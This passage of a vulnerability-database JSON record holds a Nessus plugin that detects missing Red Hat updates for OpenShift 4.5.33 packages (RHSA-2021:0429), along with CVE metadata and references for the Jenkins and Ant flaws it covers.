["ORACLE:CPUJAN2021", "ORACLE:CPUAPR2021", "ORACLE:CPUJUL2021", "ORACLE:CPUJUL2020", "ORACLE:CPUOCT2020"]}], "modified": "2021-08-06T13:27:10", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2021-08-06T13:27:10", "rev": 2}}, "objectVersion": "1.6", "pluginID": "147015", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0429. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147015);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/26\");\n\n script_cve_id(\n \"CVE-2020-1945\",\n \"CVE-2020-11979\",\n \"CVE-2021-21602\",\n \"CVE-2021-21603\",\n \"CVE-2021-21604\",\n \"CVE-2021-21605\",\n \"CVE-2021-21606\",\n \"CVE-2021-21607\",\n \"CVE-2021-21608\",\n \"CVE-2021-21609\",\n \"CVE-2021-21610\",\n \"CVE-2021-21611\",\n \"CVE-2021-21615\"\n );\n script_xref(name:\"RHSA\", value:\"2021:0429\");\n script_xref(name:\"IAVA\", value:\"2020-A-0324\");\n script_xref(name:\"IAVA\", value:\"2021-A-0035-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0196\");\n script_xref(name:\"IAVA\", value:\"2021-A-0039-S\");\n\n script_name(english:\"RHEL 7 / 8 : OpenShift Container Platform 4.5.33 packages and (RHSA-2021:0429)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0429 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n - jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/20.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/22.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/59.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/79.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/377.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/502.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/770.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/863.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-11979\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21602\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21605\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21606\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21607\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21608\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21609\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21611\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21615\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0429\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1837444\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1903702\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1921322\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925141\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925143\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925145\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925151\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925156\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925157\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925159\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925161\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21605\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 22, 59, 79, 377, 502, 770, 863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:conmon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:machine-config-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients-redistributable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:runc\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release_list(operator: 'ge', os_version: os_ver, rhel_versions: ['7','8'])) audit(AUDIT_OS_NOT, 'Red Hat 7.x / 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'openshift_4_5_el7': [\n 'rhel-7-for-system-z-ose-4.5-debug-rpms',\n 'rhel-7-for-system-z-ose-4.5-rpms',\n 'rhel-7-for-system-z-ose-4.5-source-rpms',\n 'rhel-7-server-ose-4.5-debug-rpms',\n 'rhel-7-server-ose-4.5-rpms',\n 'rhel-7-server-ose-4.5-source-rpms'\n ],\n 'openshift_4_5_el8': [\n 'rhocp-4.5-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.5-for-rhel-8-s390x-rpms',\n 'rhocp-4.5-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-source-rpms'\n ]\n};\n\nrepo_sets = rhel_get_valid_repo_sets(repositories:repositories);\nif(repo_sets == RHEL_REPOS_NO_OVERLAP_MESSAGE || empty_or_null(repo_sets)) audit(AUDIT_PACKAGE_LIST_MISSING, RHEL_REPO_AUDIT_PACKAGE_LIST_DETAILS);\n\npkgs = [\n {'reference':'conmon-2.0.21-1.rhaos4.5.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_5_el7']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_5_el7']},\n {'reference':'jenkins-2.263.3.1612434332-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-ansible-4.5.0-202102031005.p0.git.0.c6839a2.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-ansible-test-4.5.0-202102031005.p0.git.0.c6839a2.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-clients-redistributable-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_5_el8']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_5_el8']},\n {'reference':'machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'openshift-clients-redistributable-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'runc-1.0.0-72.rhaos4.5.giteadfc6b.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'runc-1.0.0-72.rhaos4.5.giteadfc6b.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = rhel_decide_repo_check(repo_list:repo_list, repo_sets:repo_sets);\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(repo_sets)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'conmon / jenkins / machine-config-daemon / openshift-ansible / etc');\n}\n", "naslFamily": "Red Hat Local Security Checks", "cpe": ["cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:8", "p-cpe:/a:redhat:enterprise_linux:conmon", "p-cpe:/a:redhat:enterprise_linux:jenkins", "p-cpe:/a:redhat:enterprise_linux:machine-config-daemon", "p-cpe:/a:redhat:enterprise_linux:openshift-ansible", "p-cpe:/a:redhat:enterprise_linux:openshift-ansible-test", "p-cpe:/a:redhat:enterprise_linux:openshift-clients", "p-cpe:/a:redhat:enterprise_linux:openshift-clients-redistributable", "p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube", "p-cpe:/a:redhat:enterprise_linux:runc"], "solution": "Update the affected packages.", "nessusSeverity": "", "cvssScoreSource": "CVE-2021-21605", "vpr": {"risk factor": "Medium", "score": "6"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-03-03T00:00:00", "vulnerabilityPublicationDate": "2020-05-14T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-06T13:27:10", "differentElements": ["nessusSeverity"], "edition": 8}, {"bulletin": {"id": "REDHAT-RHSA-2021-0429.NASL", "hash": "c2e842999049d6ddff829ea155fce7c8", "type": "nessus", "bulletinFamily": "scanner", "title": "RHEL 7 / 8 : OpenShift Container Platform 4.5.33 packages and (RHSA-2021:0429)", "description": "The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2021:0429 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n - jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-03-03T00:00:00", "modified": "2021-07-26T00:00:00", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/147015", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bugzilla.redhat.com/1925160", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21602", "https://access.redhat.com/security/cve/CVE-2021-21606", "https://cwe.mitre.org/data/definitions/20.html", "https://cwe.mitre.org/data/definitions/79.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21603", "https://cwe.mitre.org/data/definitions/863.html", "https://bugzilla.redhat.com/1925161", "https://access.redhat.com/security/cve/CVE-2021-21609", "https://bugzilla.redhat.com/1925156", "https://access.redhat.com/security/cve/CVE-2021-21615", "https://bugzilla.redhat.com/1925143", "https://cwe.mitre.org/data/definitions/22.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21606", "https://cwe.mitre.org/data/definitions/502.html", "https://bugzilla.redhat.com/1903702", "https://access.redhat.com/security/cve/CVE-2020-1945", "https://cwe.mitre.org/data/definitions/377.html", "https://access.redhat.com/security/cve/CVE-2021-21611", "https://access.redhat.com/security/cve/CVE-2021-21603", "https://access.redhat.com/errata/RHSA-2021:0429", "https://bugzilla.redhat.com/1925141", "https://cwe.mitre.org/data/definitions/59.html", "https://access.redhat.com/security/cve/CVE-2021-21608", "https://bugzilla.redhat.com/1925140", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21605", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21608", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21610", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1945", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21609", "https://access.redhat.com/security/cve/CVE-2021-21604", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11979", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21604", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21611", "https://cwe.mitre.org/data/definitions/770.html", "https://access.redhat.com/security/cve/CVE-2021-21610", "https://access.redhat.com/security/cve/CVE-2021-21607", "https://access.redhat.com/security/cve/CVE-2021-21602", "https://bugzilla.redhat.com/1925157", "https://bugzilla.redhat.com/1925159", "https://access.redhat.com/security/cve/CVE-2020-11979", "https://bugzilla.redhat.com/1837444", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21615", "https://bugzilla.redhat.com/1921322", "https://bugzilla.redhat.com/1925151", "https://bugzilla.redhat.com/1925145", "https://access.redhat.com/security/cve/CVE-2021-21605", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21607"], "cvelist": ["CVE-2020-1945", "CVE-2020-11979", "CVE-2021-21602", "CVE-2021-21603", "CVE-2021-21604", "CVE-2021-21605", "CVE-2021-21606", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21609", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21615"], "immutableFields": [], "lastseen": "2021-08-19T12:06:10", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2021:0423", "RHSA-2020:2618", "RHSA-2021:0719", "RHSA-2020:4961", "RHSA-2020:4960", "RHSA-2021:0637", "RHSA-2021:0429"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2021-0423.NASL", "FEDORA_2020-7F07DA3FEF.NASL", "FEDORA_2020-92B1D001B3.NASL", "EULEROS_SA-2020-1794.NASL", "PHOTONOS_PHSA-2020-3_0-0155_APACHE.NASL", "OPENSUSE-2020-1022.NASL", "ORACLE_ENTERPRISE_MANAGER_OPS_CENTER_JUL_2020_CPU.NASL", "PHOTONOS_PHSA-2020-3_0-0099_APACHE.NASL", "EULEROS_SA-2020-2327.NASL", "FREEBSD_PKG_6D5F1B0BB86548D5935B3FB6EBB425FC.NASL", "PHOTONOS_PHSA-2020-1_0-0335_APACHE.NASL", "JENKINS_2_276.NASL", "FEDORA_2020-52741B0A49.NASL", "GENTOO_GLSA-202007-34.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JUL_2020.NASL", "REDHAT-RHSA-2021-0637.NASL", "FEDORA_2020-3CE0F55BC5.NASL", "UBUNTU_USN-4380-1.NASL", "ORACLE_PRIMAVERA_UNIFIER_CPU_JUL_2020.NASL", "FEDORA_2020-2640AA4E19.NASL", "GENTOO_GLSA-202011-18.NASL", "EULEROS_SA-2020-2132.NASL", "ORACLE_PRIMAVERA_UNIFIER_CPU_JAN_2021.NASL", "ORACLE_BPM_CPU_OCT_2020.NASL", "PHOTONOS_PHSA-2020-1_0-0298_APACHE.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JAN_2021.NASL", "EULEROS_SA-2020-1915.NASL", "JENKINS_2_274.NASL", "EULEROS_SA-2021-1133.NASL", "PHOTONOS_PHSA-2020-2_0-0291_APACHE.NASL"]}, {"type": "archlinux", "idList": ["ASA-202005-15", "ASA-202012-5", "ASA-202101-41"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-21608", "RH:CVE-2021-21604", "RH:CVE-2021-21615", "RH:CVE-2020-11979", "RH:CVE-2021-21607", "RH:CVE-2021-21610", "RH:CVE-2020-1945", "RH:CVE-2021-21605", "RH:CVE-2021-21603", "RH:CVE-2021-21611", "RH:CVE-2021-21609", "RH:CVE-2021-21602", "RH:CVE-2021-21606"]}, {"type": "cve", "idList": ["CVE-2021-21611", "CVE-2021-21615", "CVE-2021-21603", "CVE-2021-21605", "CVE-2021-21602", "CVE-2021-21604", "CVE-2020-11979", "CVE-2020-1945", "CVE-2021-21610", "CVE-2021-21608", "CVE-2021-21606", "CVE-2021-21609", "CVE-2021-21607"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1945", "UB:CVE-2020-11979"]}, {"type": "github", "idList": ["GHSA-F62V-XPXF-3V68", "GHSA-4P6W-M9WC-C9C9"]}, {"type": "gentoo", "idList": ["GLSA-202007-34", "GLSA-202011-18"]}, {"type": "fedora", "idList": ["FEDORA:2D51F60C28B2", "FEDORA:146FE30DD5E7", "FEDORA:6869030D3139", "FEDORA:52396606732B", "FEDORA:88EAA30905CF"]}, {"type": "photon", "idList": ["PHSA-2021-4.0-0036", "PHSA-2020-3.0-0155", "PHSA-2020-1.0-0335", "PHSA-2020-1.0-0298", "PHSA-2020-2.0-0247", "PHSA-2020-2.0-0291", "PHSA-2020-3.0-0099"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877939", "OPENVAS:1361412562310844454", "OPENVAS:1361412562310877930"]}, {"type": "ubuntu", "idList": ["USN-4380-1"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1022-1"]}, {"type": "freebsd", "idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"]}, {"type": "oracle", "idList": ["ORACLE:CPUJUL2020", "ORACLE:CPUOCT2020", "ORACLE:CPUJUL2021", "ORACLE:CPUAPR2021", "ORACLE:CPUJAN2021"]}], "modified": "2021-08-19T12:06:10", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2021-08-19T12:06:10", "rev": 2}}, "objectVersion": "1.6", "pluginID": "147015", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0429. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147015);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/26\");\n\n script_cve_id(\n \"CVE-2020-1945\",\n \"CVE-2020-11979\",\n \"CVE-2021-21602\",\n \"CVE-2021-21603\",\n \"CVE-2021-21604\",\n \"CVE-2021-21605\",\n \"CVE-2021-21606\",\n \"CVE-2021-21607\",\n \"CVE-2021-21608\",\n \"CVE-2021-21609\",\n \"CVE-2021-21610\",\n \"CVE-2021-21611\",\n \"CVE-2021-21615\"\n );\n script_xref(name:\"RHSA\", value:\"2021:0429\");\n script_xref(name:\"IAVA\", value:\"2020-A-0324\");\n script_xref(name:\"IAVA\", value:\"2021-A-0035-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0196\");\n script_xref(name:\"IAVA\", value:\"2021-A-0039-S\");\n\n script_name(english:\"RHEL 7 / 8 : OpenShift Container Platform 4.5.33 packages and (RHSA-2021:0429)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0429 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n - jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", 